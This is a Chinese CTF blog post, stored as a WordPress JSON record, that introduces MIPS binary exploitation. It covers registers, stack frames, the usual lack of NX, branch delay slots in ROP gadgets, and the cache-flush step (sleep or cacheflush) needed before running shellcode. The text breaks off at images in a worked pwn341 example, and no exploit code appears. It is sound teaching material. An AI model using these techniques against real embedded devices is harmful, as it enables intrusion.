{"id":1039,"date":"2025-05-23T18:55:51","date_gmt":"2025-05-23T10:55:51","guid":{"rendered":"http:\/\/8.141.27.105\/?p=1039"},"modified":"2025-05-23T20:18:43","modified_gmt":"2025-05-23T12:18:43","slug":"%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/","title":{"rendered":"\u5f02\u67b6\u6784|MIPS\u67b6\u6784\u521d\u63a2"},"content":{"rendered":"\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/\">https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pocs.app\/exploiting-buffer-overflows-on-mips-architectures\">https:\/\/pocs.app\/exploiting-buffer-overflows-on-mips-architectures<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/migraine-sudo.github.io\/2021\/01\/30\/mips-pwn\">https:\/\/migraine-sudo.github.io\/2021\/01\/30\/mips-pwn<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" 
xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#%E4%B8%89%E5%A4%A7%E6%9E%B6%E6%9E%84%E5%8C%BA%E5%88%AB\" title=\"\u4e09\u5927\u67b6\u6784\u533a\u522b\">\u4e09\u5927\u67b6\u6784\u533a\u522b<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E5%AF%84%E5%AD%98%E5%99%A8\" title=\"MIPS\u5bc4\u5b58\u5668\">MIPS\u5bc4\u5b58\u5668<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%92%8C%E4%BC%A0%E5%8F%82\" title=\"MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2\">MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%9A%84%E6%A0%88\" title=\"MIPS\u7684\u6808\">MIPS\u7684\u6808<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" 
href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#MIPS%E7%9A%84%E7%89%B9%E7%82%B9\" title=\"MIPS\u7684\u7279\u70b9\">MIPS\u7684\u7279\u70b9<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#1%E3%80%81%E6%97%A0NX%EF%BC%88%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C%EF%BC%89\" title=\"1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09\">1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#2%E3%80%81%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0%E5%92%8C%E9%9D%9E%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0\" title=\"2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570\">2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#3%E3%80%81%E6%B5%81%E6%B0%B4%E7%BA%BF%E6%95%88%E5%BA%94\" title=\"3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94\">3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#4%E3%80%81%E7%BC%93%E5%AD%98%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7\" title=\"4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027\">4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link 
ez-toc-heading-10\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/05\/23\/%e5%bc%82%e6%9e%b6%e6%9e%84mips%e6%9e%b6%e6%9e%84%e5%88%9d%e6%8e%a2\/#%E4%BE%8B%E9%A2%981_CTFSHOW_pwn341\" title=\"\u4f8b\u98981: CTFSHOW  pwn341\">\u4f8b\u98981: CTFSHOW  pwn341<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%B8%89%E5%A4%A7%E6%9E%B6%E6%9E%84%E5%8C%BA%E5%88%AB\"><\/span>\u4e09\u5927\u67b6\u6784\u533a\u522b<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u4e09\u5927\u67b6\u6784\uff1aMIPS\u3001ARM\u3001x86(x86-64)\uff0c\u63a5\u89e6\u5230\u7684\u5927\u90e8\u5206pwn\u9898\u90fd\u662fx86\u67b6\u6784\uff0c\u6240\u4ee5MIPS\u7b49\u5176\u4ed6\u67b6\u6784\u7684\u9898\u578b\u5c31\u88ab\u79f0\u4e3a\u5f02\u67b6\u6784\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/MFLSE45AYMVUYM6HEO9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"757\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/MFLSE45AYMVUYM6HEO9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1040\"  sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E5%AF%84%E5%AD%98%E5%99%A8\"><\/span>MIPS\u5bc4\u5b58\u5668<span 
class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>MIPS\u670932\u4f4d\u4e5f\u670964\u4f4d\uff0c\u5bc4\u5b58\u5668\u90fd\u4ee5$\u5f00\u5934\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$zero # \u6c38\u8fdc\u8fd4\u56de 0\u3002<\/li>\n\n\n\n<li>$v0 &#8211; $v1 # \u5b58\u50a8\u51fd\u6570\u8fd4\u56de\u503c\u3002<\/li>\n\n\n\n<li>$a0 &#8211; $a3 # \u7528\u4e8e\u51fd\u6570\u8c03\u7528\u65f6\u7684\u53c2\u6570\u4f20\u9012\uff0c\u82e5\u53c2\u6570\u8d85\u8fc7 <strong>4 \u4e2a<\/strong>\uff0c\u5219\u591a\u4f59\u7684\u53c2\u6570\u4f7f\u7528\u5806\u6808\u4f20\u9012\u3002<\/li>\n\n\n\n<li>$s0 &#8211; $s7 # \u5b58\u50a8\u5404\u79cd\u4e1c\u897f\uff0c\u51fd\u6570\u8c03\u7528\u65f6\u9700\u5c06\u7528\u5230\u7684\u5bc4\u5b58\u5668\u4fdd\u5b58\u5230\u5806\u6808\u3002<\/li>\n\n\n\n<li>$sp # \u6808\u6307\u9488\uff0c\u6307\u5411\u6808\u9876\u3002<\/li>\n\n\n\n<li>$ra # \u5b58\u50a8\u8fd4\u56de\u5730\u5740\u3002<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%92%8C%E4%BC%A0%E5%8F%82\"><\/span>MIPS\u7cfb\u7edf\u8c03\u7528\u548c\u4f20\u53c2<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>$v0 \u4fdd\u5b58\u9700\u8981\u6267\u884c\u7684\u7cfb\u7edf\u8c03\u7528\u7684\u8c03\u7528\u53f7\uff0c\u53c2\u6570 1 \uff5e 4 \u5206\u522b\u4fdd\u5b58\u5728 $a0 ~ $a3 \u5bc4\u5b58\u5668\u4e2d\uff0c\u5269\u4e0b\u7684\u53c2\u6570\u653e\u5728\u6808\u4e2d\uff0c\u8fd4\u56de\u503c\u4e5f\u5b58\u653e\u5728 $v0 \u4e2d\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"MIPS%E7%9A%84%E6%A0%88\"><\/span>MIPS\u7684\u6808<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u4e0ex86\u4e0d\u4e00\u6837\uff0cMIPS\u6ca1\u6709pop\u548cpush\u6307\u4ee4\uff0c\u901a\u8fc7 load \u6216\u8005 store 
\u6307\u4ee4\u8fdb\u884c\u5185\u5b58\u8bbf\u95ee\u7684\u65b9\u5f0f\u4f7f\u7528\u6808\u3002<\/p>\n\n\n\n<p>\u6808\u7684\u5173\u952e\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<p><strong><code>$sp<\/code>\uff08Stack Pointer\uff0c\u5bc4\u5b58\u566829\uff09<\/strong>\uff1a<br>\u59cb\u7ec8\u6307\u5411\u6808\u9876\uff08\u6808\u4ece\u9ad8\u5730\u5740\u5411\u4f4e\u5730\u5740\u751f\u957f\uff0c<code>push<\/code>\u65f6\u9012\u51cf\uff0c<code>pop<\/code>\u65f6\u9012\u589e\uff09\u3002<\/p>\n\n\n\n<p><strong><code>$fp<\/code>\uff08Frame Pointer\uff0c\u5bc4\u5b58\u566830\uff0c\u53ef\u9009\uff09<\/strong>\uff1a<br>\u7528\u4e8e\u6807\u8bb0\u5f53\u524d\u51fd\u6570\u7684\u6808\u5e27\u8d77\u59cb\u5730\u5740\uff0c\u4fbf\u4e8e\u8c03\u8bd5\u548c\u5c40\u90e8\u53d8\u91cf\u8bbf\u95ee\uff08\u7c7b\u4f3cx86\u7684<code>ebp<\/code>\uff09\u3002\u8be5\u5bc4\u5b58\u5668\u4e0d\u662f\u5fc5\u987b\u7684\uff0c\u56e0\u4e3aMIPS\u91c7\u7528<strong>\u504f\u79fb\u5bfb\u5740<\/strong>\u6765\u8bbf\u95ee\u53d8\u91cf\uff0c\u4ec5\u6709$sp\u4e5f\u80fd\u5b8c\u6210\u6808\u5e27\u7684\u7ef4\u62a4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"472\" height=\"496\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1043\"  sizes=\"auto, (max-width: 472px) 100vw, 472px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span 
class=\"ez-toc-section\" id=\"MIPS%E7%9A%84%E7%89%B9%E7%82%B9\"><\/span>MIPS\u7684\u7279\u70b9<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1%E3%80%81%E6%97%A0NX%EF%BC%88%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C%EF%BC%89\"><\/span>1\u3001\u65e0NX\uff08\u6808\u4e0d\u53ef\u6267\u884c\uff09<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>这里的 NX 指的是“栈不可执行”保护。由于早期的 MIPS 核心在硬件上不支持不可执行页，MIPS 平台上的二进制其栈\/bss 通常都是可执行的，可以直接把 shellcode 放到栈上执行。但这不是绝对的：带 RIXI（Execute Inhibit）扩展的较新 MIPS 核心配合相应内核是能够实现不可执行页的，所以拿到题目后仍应先用 checksec 或 readelf -l 查看 GNU_STACK 段是否带 E 标志，而不是默认栈一定可执行。<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2%E3%80%81%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0%E5%92%8C%E9%9D%9E%E5%8F%B6%E5%AD%90%E5%87%BD%E6%95%B0\"><\/span>2\u3001\u53f6\u5b50\u51fd\u6570\u548c\u975e\u53f6\u5b50\u51fd\u6570<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>x86 在调用函数时，call 指令会把<strong>返回地址（ret）<\/strong>压入栈中，被调函数的序言再把调用者的 <strong>bp<\/strong> 压栈，所以两者都位于栈上，可以被栈溢出覆盖。<\/p>\n\n\n\n<p>\u800cMIPS\u4e2d\u5219\u5206\u4e3a\u4e24\u79cd\u60c5\u51b5\uff1a<\/p>\n\n\n\n<p>对于<strong>叶子函数<\/strong>（不再调用其他函数的函数），jal\/jalr 把返回地址写入 $ra 之后，叶子函数自身<strong>不会<\/strong>把 $ra 保存到栈上，返回时直接 jr $ra。这意味着叶子函数内部的栈溢出无法直接覆盖它自己的返回地址：溢出数据要越过本函数的栈帧，去覆盖上层（非叶子）调用者保存在栈上的 $ra，控制流劫持要等到调用者返回时才生效，计算偏移时必须以调用者的栈帧为准。<\/p>\n\n\n\n<p>对于<strong>非叶子函数<\/strong>（即函数中还调用了其他函数），则和 x86 类似：函数在序言中把 $ra（返回到 caller 的地址）保存到自己的栈帧里，返回前再从栈上恢复，所以可以像 x86 一样通过栈溢出直接覆盖这个保存在栈上的返回地址。<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"3%E3%80%81%E6%B5%81%E6%B0%B4%E7%BA%BF%E6%95%88%E5%BA%94\"><\/span>3\u3001\u6d41\u6c34\u7ebf\u6548\u5e94<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>流水线是指本应顺序执行的几条指令同时处于执行过程中，只不过各自处于不同的阶段（经典教材把一条指令的执行周期分为：取指、间址、执行、中断；现代 MIPS 的五级流水线则分为取指、译码、执行、访存、写回）。如下图所示，参考二次重叠执行方式：第一条指令在执行时，第二条指令在分析（译码），第三条指令在取指。<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"696\" height=\"310\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1045\"  sizes=\"auto, (max-width: 696px) 100vw, 696px\" \/><\/div><\/figure>\n\n\n\n<p>MIPS 规定：跳转\/分支指令后面紧跟的那一条指令，会在控制流真正转移之前被执行，这个位置被称为<strong>分支延迟槽<\/strong>（branch delay slot）。无论分支是否发生，延迟槽里的指令都会执行。<\/p>\n\n\n\n<p>\u4e00\u4e2a\u4f8b\u5b50\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>move $a0,$s1\njalr $t9        # $t9 = strrchr，使用了 $a0 作为参数\nmove $a0,$s0    # 延迟槽：在跳转生效前执行<\/code><\/pre>\n\n\n\n<p>\u8bf7\u95ee\u5728\u7b2c\u4e8c\u6b65\u65f6\uff0c$a0\u7684\u503c\u662f$s1\u8fd8\u662f$s0\uff1f<\/p>\n\n\n\n<p>答案：由于分支延迟槽，move $a0,$s0 在 jalr 的跳转生效之前就已经执行，所以进入 strrchr 时 $a0 的值是 $s0 而不是 $s1。逆向和找 ROP gadget 时要特别注意这一点：反汇编器按线性顺序显示，延迟槽里的指令看起来像是“调用之后”才执行；一个以 jr\/jalr 结尾的 gadget，实际生效的指令序列还包括它后面那条延迟槽指令。<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"4%E3%80%81%E7%BC%93%E5%AD%98%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7\"><\/span>4\u3001\u7f13\u5b58\u4e0d\u4e00\u81f4\u6027<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u9996\u5148\u4e86\u89e3\u4e00\u4e0b\u54c8\u4f5b\u7ed3\u6784\u4e0e\u51af\u8bfa\u4f9d\u66fc\u7ed3\u6784\u7684\u533a\u522b\uff1a<\/p>\n\n\n\n<p>\u54c8\u4f5b\u7ed3\u6784\uff1a\u6307\u4ee4\u548c\u6570\u636e<strong>\u5206\u5f00<\/strong>\u5b58\u50a8<\/p>\n\n\n\n<p>\u51af\u8bfa\u4f9d\u66fc\u7ed3\u6784\uff1a\u6307\u4ee4\u548c\u6570\u636e<strong>\u4e0d\u5206\u5f00<\/strong>\uff0c\u5171\u4eab\u540c\u4e00\u5b58\u50a8\u7a7a\u95f4\u548c\u603b\u7ebf<\/p>\n\n\n\n<p>MIPS 在 L1 缓存层面采用<strong>哈佛结构的缓存设计<\/strong>（即所谓“改进型哈佛结构”：主存是统一的，但 <strong>指令缓存 Instruction cache（I-Cache）<\/strong> 和 <strong>数据缓存 Data cache（D-Cache）<\/strong> 物理分离）。这种设计提高了指令和数据的并行访问能力，但也引入了 <strong>缓存一致性问题<\/strong>：对同一地址，D-Cache 中的写入不会自动同步到 I-Cache。<\/p>\n\n\n\n<p>\u5982\u56fe\u6240\u793a\uff0c I-Cache\u7f13\u5b58<strong>\u53ef\u6267\u884c\u6307\u4ee4<\/strong>\uff0cCPU \u53ea\u80fd\u4ece I-Cache 
\u4e2d\u53d6\u6307\u4ee4\u6267\u884c\u3002D-Cache\u7f13\u5b58<strong>\u7a0b\u5e8f\u6570\u636e<\/strong>\uff08\u5982\u6808\u3001\u5806\u3001\u5168\u5c40\u53d8\u91cf\u7b49\uff09\uff0c\u6240\u6709\u6570\u636e\u8bfb\u5199\u64cd\u4f5c\u90fd\u7ecf\u8fc7 D-Cache\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-2-1024x567.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"567\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/image-2-1024x567.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1046\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>MIPS \u901a\u5e38\u91c7\u7528\u00a0<strong>\u5199\u56de\uff08Write-Back\uff09\u7b56\u7565<\/strong>\uff0c\u5373\u4fee\u6539\u540e\u7684\u6570\u636e\u4e0d\u4f1a\u7acb\u5373\u540c\u6b65\u5230\u4e3b\u5b58\uff0c\u800c\u662f\u7559\u5728D-Cache 
\u4e2d\uff0c\u76f4\u5230\u88ab\u66ff\u6362\u6216\u663e\u5f0f\u5237\u65b0\u3002所以刚写入的 shellcode 不会马上出现在 I-Cache 里供取指执行，而是先停留在 D-Cache 中；即便之后写回了主存，I-Cache 也不会自动感知这次修改，CPU 按该地址取指时拿到的仍可能是旧内容。<\/p>\n\n\n\n<p>所以在写 exp 的时候，通常会在跳到 shellcode 之前先调用一次 sleep，让 shellcode 从 D-Cache 写回主存并使 I-Cache 失效，否则 shellcode 很可能执行失败。也就是说不能像 x86 下那样直接把返回地址指向 shellcode，而是需要构造一条 ROP 链：先调用 sleep 函数，然后再跳转到 shellcode。<\/p>\n\n\n\n<p>sleep 之所以能规避 MIPS 的缓存不一致问题，通常的解释是：它通过系统调用进入内核态并让出 CPU，进程被调度切换时内核会执行缓存维护（把 D-Cache 中的脏数据写回内存，并使 I-Cache 失效），之后 CPU 重新取指就能看到写入的 shellcode。需要注意这只是借用了内核调度的副作用，并不是有文档保证的接口；更明确的做法是在 ROP 链里直接调用 libc 的 cacheflush（MIPS Linux 专有的系统调用）对 shellcode 所在区间做同步。另外 qemu-user 这类模拟环境一般不模拟缓存，本地往往不会复现这个问题，本地打通不代表真机也能打通。<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BE%8B%E9%A2%981_CTFSHOW_pwn341\"><\/span>\u4f8b\u98981: CTFSHOW  pwn341<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u903b\u8f91\u975e\u5e38\u7b80\u5355\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/L1EKPKHZ6RY7WNWMKT.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"201\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/L1EKPKHZ6RY7WNWMKT.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1050\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/JHRFBAPC48QS389BN.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"206\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/JHRFBAPC48QS389BN.png\" 